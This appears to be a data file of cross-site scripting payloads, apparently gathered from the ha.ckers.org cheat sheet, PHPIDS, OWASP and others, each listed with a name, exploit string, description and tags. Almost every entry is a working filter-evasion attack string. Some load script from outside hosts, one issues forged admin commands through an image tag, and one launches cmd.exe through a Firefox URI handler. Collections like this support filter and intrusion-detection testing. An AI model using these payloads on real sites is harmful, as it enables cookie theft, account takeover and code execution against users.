+Author Name: ha.ckers.org + +Extraneous Open Brackets +Exploit Name: Extraneous Open Brackets +Exploit String: <<SCRIPT>alert("XSS");//<</SCRIPT> +Exploit Description: (Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error. +Exploit Tags: general, obfuscated +Author Name: ha.ckers.org + +Filter Evasion 1 +Exploit Name: Filter Evasion 1 +Exploit String: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Filter Evasion 2 +Exploit Name: Filter Evasion 2 +Exploit String: <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Firefox Lookups 1 +Exploit Name: Firefox Lookups 1 +Exploit String: <A HREF="//google">XSS</A> +Exploit Description: Firefox uses Google's ”feeling lucky” function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's ”keyword:” protocol. You can concatenate several keywords by using something like the following ”keyword:XSS+RSnake” +Exploit Tags: general, evil tags, gecko +Author Name: ha.ckers.org + +Firefox Lookups 2 +Exploit Name: Firefox Lookups 2 +Exploit String: <A HREF="http://ha.ckers.org@google">XSS</A> +Exploit Description: This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the ”feeling lucky” function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera. +Exploit Tags: general, evil tags, obfuscated, gecko +Author Name: ha.ckers.org + +Firefox Lookups 3 +Exploit Name: Firefox Lookups 3 +Exploit String: <A HREF="http://google:ha.ckers.org">XSS</A> +Exploit Description: This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the ”feeling lucky” function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case ”google”). +Exploit Tags: general, evil tags, obfuscated, gecko +Author Name: ha.ckers.org + +firefoxurl: uri exploit (UXSS) +Exploit Name: firefoxurl: uri exploit (UXSS) +Exploit String: firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" +Exploit Description: This vector creates an UXSS via firefoxurl: +Exploit Tags: URI exploits, general, injection, obfuscated, internet explorer +Author Name: xs-sniper + +FRAME +Exploit Name: FRAME +Exploit String: <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +Exploit Description: Frame (Frames have the same sorts of XSS problems as iframes). +Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +Grave Accents +Exploit Name: Grave Accents +Exploit String: <IMG SRC=`javascript:alert("RSnake says### 'XSS'")`> +Exploit Description: Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +Half-Open HTML/JavaScript +Exploit Name: Half-Open HTML/JavaScript +Exploit String: <IMG SRC="javascript:alert('XSS')" +Exploit Description: Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the ”javascript:” directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex: + /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ +As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag. +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +Hex Encoding +Exploit Name: Hex Encoding +Exploit String: <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Hex Encoding w/out Semicolons +Exploit Name: Hex Encoding w/out Semicolons +Exploit String: <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +Exploit Description: Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +HTML Entities +Exploit Name: HTML Entities +Exploit String: <IMG SRC=javascript:alert(&quot;XSS&quot;)> +Exploit Description: HTML entities (the semicolons are required for this to work). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +HTML Quoute & Comment breaker +Exploit Name: HTML Quoute & Comment breaker +Exploit String: '';!--"<script>alert(0);</script>=&{(alert(1))} +Exploit Description: This vector breaks HTML quotes and comments. +Exploit Tags: general, html breaking, comment breaking +Author Name: .mario + +HTML wrapped in XML +Exploit Name: HTML wrapped in XML +Exploit String: <?xml version="1.0"?> +<html:html xmlns:html='http://www.w3.org/1999/xhtml'> +<html:script> +alert(document.cookie); +</html:script> +</html:html> +Exploit Description: This vector uses HTML wrapped in XML and can be used to circumvent common filters. This works in Gecko based browsers only. +Exploit Tags: general, XML injection, evil tags, gecko, obfuscated +Author Name: SIrDarckCat + +IE backticked semicolon injection +Exploit Name: IE backticked semicolon injection +Exploit String: <img src=`x` onrerror= ` ;; alert(1) ` /> +Exploit Description: This vector utilized back ticks as attribute delimiters. This works only in IE. +Exploit Tags: general, injection, internet explorer +Author Name: .mario + +IE closing-tag expression injection +Exploit Name: IE closing-tag expression injection +Exploit String: </a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')"> +Exploit Description: This vector exploits a bug in IE whre attributes in closing comments are evaluated. +Exploit Tags: general, injection, internet explorer +Author Name: .mario + +IE expression injection +Exploit Name: IE expression injection +Exploit String: style=color: expression(alert(0));" a=" +Exploit Description: This vector utilizes the feature of CSS expressions in IE. +Exploit Tags: general, injection, internet explorer, style injection +Author Name: .mario + +IE VB Messagebox injection +Exploit Name: IE VB Messagebox injection +Exploit String: vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +Exploit Description: This injects VB code and produces a message box. IE only. +Exploit Tags: general, basic, internet explorer +Author Name: .mario + +IFRAME +Exploit Name: IFRAME +Exploit String: <IFRAME SRC="javascript:alert('XSS');"></IFRAME> +Exploit Description: Iframe (If iframes are allowed there are a lot of other XSS problems as well). +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +Image onerror wrapped in XML statement +Exploit Name: Image onerror wrapped in XML statement +Exploit String: a=<a> +<b> +%3c%69%6d%67%2f%73%72%63%3d%31 +%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e +</b> +</a> +document.write(unescape(a..b)) +Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context. +Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags +Author Name: .mario + +Image tag with obfuscated JS URI +Exploit Name: Image tag with obfuscated JS URI +Exploit String: <IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> +Exploit Description: This vector creates three image tags with differing CRLF obfuscation in the javascript: URI. +Exploit Tags: general, basic, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Image w/CharCode +Exploit Name: Image w/CharCode +Exploit String: <IMG SRC=javascript:alert(String.fromCharCode(88###83###83))> +Exploit Description: If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need. +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +IMG Dynsrc +Exploit Name: IMG Dynsrc +Exploit String: <IMG DYNSRC="javascript:alert('XSS');"> +Exploit Description: IMG Dynsrc +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG Embedded commands 1 +Exploit Name: IMG Embedded commands 1 +Exploit String: <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Exploit Description: This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +IMG Embedded commands 2 +Exploit Name: IMG Embedded commands 2 +Exploit String: Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +Exploit Description: IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC=”http://badguy.com/a.jpg”> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this). +Exploit Tags: general, redirect +Author Name: ha.ckers.org + +IMG Lowsrc +Exploit Name: IMG Lowsrc +Exploit String: <IMG LOWSRC="javascript:alert('XSS');"> +Exploit Description: IMG Lowsrc +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG No Quotes/Semicolon +Exploit Name: IMG No Quotes/Semicolon +Exploit String: <IMG SRC=javascript:alert('XSS')> +Exploit Description: No quotes and no semicolon +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG STYLE w/expression +Exploit Name: IMG STYLE w/expression +Exploit String: exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +Exploit Description: IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop). +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG w/JavaScript Directive +Exploit Name: IMG w/JavaScript Directive +Exploit String: <IMG SRC="javascript:alert('XSS');"> +Exploit Description: Image XSS using the JavaScript directive. +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IMG w/VBscript +Exploit Name: IMG w/VBscript +Exploit String: <IMG SRC='vbscript:msgbox("XSS")'> +Exploit Description: VBscript in an image +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +INPUT Image +Exploit Name: INPUT Image +Exploit String: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +Exploit Description: INPUT Image +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +IP Encoding +Exploit Name: IP Encoding +Exploit String: <A HREF="http://66.102.7.147/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +JavaScript concatenation vector variant 1 +Exploit Name: JavaScript concatenation vector variant 1 +Exploit String: s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1 +Exploit Description: This vector concatenates a string and evaluates it via mapping on URL +Exploit Tags: general, internet explorer, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 2 +Exploit Name: JavaScript concatenation vector variant 2 +Exploit String: s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7; +Exploit Description: This vector concatenates a string and evaluates it via self-execution. +Exploit Tags: general, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 3 +Exploit Name: JavaScript concatenation vector variant 3 +Exploit String: s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); +Exploit Description: This vector concatenates a string and evaluates it via usage of common DOM methods and element creation. +Exploit Tags: general, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 4 +Exploit Name: JavaScript concatenation vector variant 4 +Exploit String: s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)']; +Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array. +Exploit Tags: general, JSON, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 5 +Exploit Name: JavaScript concatenation vector variant 5 +Exploit String: s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+'']; +Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array. +Exploit Tags: general, JSON, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 6 +Exploit Name: JavaScript concatenation vector variant 6 +Exploit String: s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7; +Exploit Description: This vector concatenates a string and evaluates it via filling the URL property with payload concatenated in a string via ternary operators. +Exploit Tags: general, internet explorer, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript concatenation vector variant 7 +Exploit Name: JavaScript concatenation vector variant 7 +Exploit String: s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; +Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a regular string via ternary operators. +Exploit Tags: general, JSON, concatenated, obfuscated +Author Name: PHPIDS Group + +JavaScript Includes +Exploit Name: JavaScript Includes +Exploit String: <BR SIZE="&{alert('XSS')}"> +Exploit Description: &JavaScript includes (works in Netscape 4.x). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +JavaScript Link Location +Exploit Name: JavaScript Link Location +Exploit String: <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed) +JavaScript link location +Exploit Tags: general, evil tags, obfuscated, redirect +Author Name: ha.ckers.org + +JavaScript-breaker using carriage return +Exploit Name: JavaScript-breaker using carriage return +Exploit String: %0da=eval;b=alert;a(b(/d/.source)); +Exploit Description: This vector uses an urlencoded carriage return to break JS code and produce an alert afterwards. +Exploit Tags: general, JS breaking, CRLF +Author Name: kishor + +JS link with whitespace obfuscation +Exploit Name: JS link with whitespace obfuscation +Exploit String: <a href = "javas cript :ale rt(1)">test +Exploit Description: This vector utilizes whitespace to obfuscate and contains a JS link. +Exploit Tags: general, evil tags, obfuscated +Author Name: thespanner.co.uk + +JS string concatenation breaker +Exploit Name: JS string concatenation breaker +Exploit String: +alert(0)+ +Exploit Description: This can be used when input is concatenated in JavaScript. +Exploit Tags: general, JS breaking, basic +Author Name: .mario + +JSON based obfuscated onload vector +Exploit Name: JSON based obfuscated onload vector +Exploit String: <body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;; +Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM. JSON parenthesis and semicolons are to evade filters. +Exploit Tags: general, evil tags, JSON, obfuscated +Author Name: thespanner.co.uk + +JSON based onload vector +Exploit Name: JSON based onload vector +Exploit String: <body onload=a1={x:this.parent.document};a1.x.writeln(1);> +Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM +Exploit Tags: general, evil tags, JSON, obfuscated +Author Name: thespanner.co.uk + +JSON based semicolon-onload vector +Exploit Name: JSON based semicolon-onload vector +Exploit String: <body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;; +Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM. Also this vector uses semicolons to obfuscate. +Exploit Tags: general, evil tags, JSON, obfuscated +Author Name: thespanner.co.uk + +LAYER +Exploit Name: LAYER +Exploit String: <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +Exploit Description: Layer (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +List-style-image +Exploit Name: List-style-image +Exploit String: <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS +Exploit Description: Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector. +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +Livescript +Exploit Name: Livescript +Exploit String: <IMG SRC="livescript:[code]"> +Exploit Description: Livescript (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Local .htc file +Exploit Name: Local .htc file +Exploit String: <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> +Exploit Description: This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute. +Exploit Tags: general, evil tags, internet explorer, injection +Author Name: ha.ckers.org + +Long UTF-8 Unicode w/out Semicolons +Exploit Name: Long UTF-8 Unicode w/out Semicolons +Exploit String: <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +Exploit Description: Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for ”&#XX;”, since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +Malformed IMG Tags +Exploit Name: Malformed IMG Tags +Exploit String: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +Exploit Description: Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Markup breaker with special quotes +Exploit Name: Markup breaker with special quotes +Exploit String: %26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// +Exploit Description: This markup breaking vector utilizes specially crafted quotes to break the existing markup. +Exploit Tags: general, html breaking, JS breaking +Author Name: kishor + +META +Exploit Name: META +Exploit String: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +Exploit Description: The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +META w/additional URL parameter +Exploit Name: META w/additional URL parameter +Exploit String: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +Exploit Description: Meta with additional URL parameter. If the target website attempts to see if the URL contains an ”http://” you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +META w/data:URL +Exploit Name: META w/data:URL +Exploit String: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +Exploit Description: This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Mixed Encoding +Exploit Name: Mixed Encoding +Exploit String: <A HREF="http://6&#09;6.000146.0x7.147/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +The tabs and newlines only work if this is encapsulated with quotes. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Mocha +Exploit Name: Mocha +Exploit String: <IMG SRC="mocha:[code]"> +Exploit Description: Mocha (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Mozilla -moz-binding-url injection +Exploit Name: Mozilla -moz-binding-url injection +Exploit String: style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" +Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only. +Exploit Tags: general, injection, gecko, style injection, XBL +Author Name: .mario + +Mozilla -moz-binding-url injection - filter evading +Exploit Name: Mozilla -moz-binding-url injection - filter evading +Exploit String: sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=" +Exploit Description: This vector was once used on a major site to evade a stripping filter and inject binding XML. +Exploit Tags: general, injection, gecko, style injection, XBL +Author Name: PHPIDS Group + +Multiline selfcontained XSS +Exploit Name: Multiline selfcontained XSS +Exploit String: _ += +eval +b=1 +__ += +location +c=1 +_ +( +__ +. +hash +// +. +substr +(1) +) +Exploit Description: This vector uses line breaks to obfuscate and evaluates the location hash. +Exploit Tags: self contained, general, obfuscated +Author Name: .mario + +Multiline w/Carriage Returns +Exploit Name: Multiline w/Carriage Returns +Exploit String: <IMGSRC="javascript:alert('XSS')"> +Exploit Description: Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector). +Exploit Tags: general, evil tags, internet explorer +Author Name: ha.ckers.org + +Name contained XSS variant 1 +Exploit Name: Name contained XSS variant 1 +Exploit String: b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name +Exploit Description: This vector depends on attackers ability to access the window.name property where the payload is located. +Exploit Tags: general, name contained, obfuscated +Author Name: PHPIDS Group + +Name contained XSS variant 2 +Exploit Name: Name contained XSS variant 2 +Exploit String: a=/ev/// + +.source a+=/al/// + +.source a[a] (name) +Exploit Description: This name contained XSS requires newlines to be able to work - and access to the window.name property. +Exploit Tags: general, name contained, obfuscated +Author Name: .mario + +Name contained XSS variant 3 +Exploit Name: Name contained XSS variant 3 +Exploit String: a=/ev/ + +.source a+=/al/ + +.source,a = a[a] a(name) +Exploit Description: New-lined requiring name contained vector - this time not comment obfuscated so easier to detect. +Exploit Tags: general, name contained +Author Name: PHPIDS Group + +Name contained XSS variant 4 +Exploit Name: Name contained XSS variant 4 +Exploit String: setTimeout// +(name// ,0) +Exploit Description: This vector utilizes the setTimeout function to fire - also it's name contained and comment-obfuscated and requires newlines. +Exploit Tags: general, name contained, obfuscated, timed +Author Name: PHPIDS Group + +navigatorurl: code execution +Exploit Name: navigatorurl: code execution +Exploit String: navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) +Exploit Description: This navigatorurl-uri executes the cmd.exe on vulnerable systems. +Exploit Tags: URI exploits, gecko, injection, general +Author Name: xs-sniper + +No Closing Script Tag +Exploit Name: No Closing Script Tag +Exploit String: <SCRIPT SRC=http://ha.ckers.org/xss.js +Exploit Description: In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the ”></SCRIPT>” portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally. +Exploit Tags: general, evil tags, injection, gecko +Author Name: ha.ckers.org + +No Quotes/Semicolons +Exploit Name: No Quotes/Semicolons +Exploit String: <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +Exploit Description: No single quotes or double quotes or semicolons. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Non-Alpha/Non-Digit +Exploit Name: Non-Alpha/Non-Digit +Exploit String: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +Exploit Description: Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example ”<SCRIPT\s” != ”<SCRIPT/XSS\s” +Exploit Tags: general, evil tags, injection +Author Name: ha.ckers.org + +Non-Alpha/Non-Digit Part 2 +Exploit Name: Non-Alpha/Non-Digit Part 2 +Exploit String: <BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")> +Exploit Description: Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Noscript-breaker with mouseover +Exploit Name: Noscript-breaker with mouseover +Exploit String: </noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code> +Exploit Description: This vector breaks noscript areas and appends an element reacting on mouseover events. +Exploit Tags: general, html breaking, obfuscated, user interaction +Author Name: kishor + +Null Chars 1 +Exploit Name: Null Chars 1 +Exploit String: perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out +Exploit Description: Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example. +Exploit Tags: general, evil tags, obfuscated, internet explorer, CRLF +Author Name: ha.ckers.org + +Null Chars 2 +Exploit Name: Null Chars 2 +Exploit String: perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out +Exploit Description: Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date +Exploit Tags: general, evil tags, obfuscated, CRLF +Author Name: ha.ckers.org + +Obfuscated body onload vector +Exploit Name: Obfuscated body onload vector +Exploit String: <body onload=;;;;;;;;;;;_=alert;_(1);;;; +Exploit Description: This vector creates a new body tag and utilizes semicolons and underscores to evade filters and produce an alert. +Exploit Tags: general, evil tags, obfuscated +Author Name: thespanner.co.uk + +Obfuscated DOM element creation +Exploit Name: Obfuscated DOM element creation +Exploit String: s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2= +0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7= +0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=pa +rentNode;x.appendChild(i); +Exploit Description: This vector utilizes ternary operators to obfuscate JavaScript code which creates new DOM elements. +Exploit Tags: general, obfuscated, injection +Author Name: thespanner.co.uk + +Obfuscated double-body onload vector +Exploit Name: Obfuscated double-body onload vector +Exploit String: <body <body onload=;;;;;al:eval('al'+'ert(1)');;> +Exploit Description: This vector creates a doubled new body tag and utilizes semicolons to evade filters and produce an alert. +Exploit Tags: general, evil tags, obfuscated +Author Name: thespanner.co.uk + +Obfuscated image tag using dec entities +Exploit Name: Obfuscated image tag using dec entities +Exploit String: <IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97; +&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41> +Exploit Description: This attack is built together with obfuscated decimal entities and create a JS image source. +Exploit Tags: general, basic, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated image tag using hex entities +Exploit Name: Obfuscated image tag using hex entities +Exploit String: <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28 +&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> +Exploit Description: This attack is built together with obfuscated hexadecimal entities and create a JS image source. +Exploit Tags: general, basic, obfuscated, evil tags, internet explorer +Author Name: 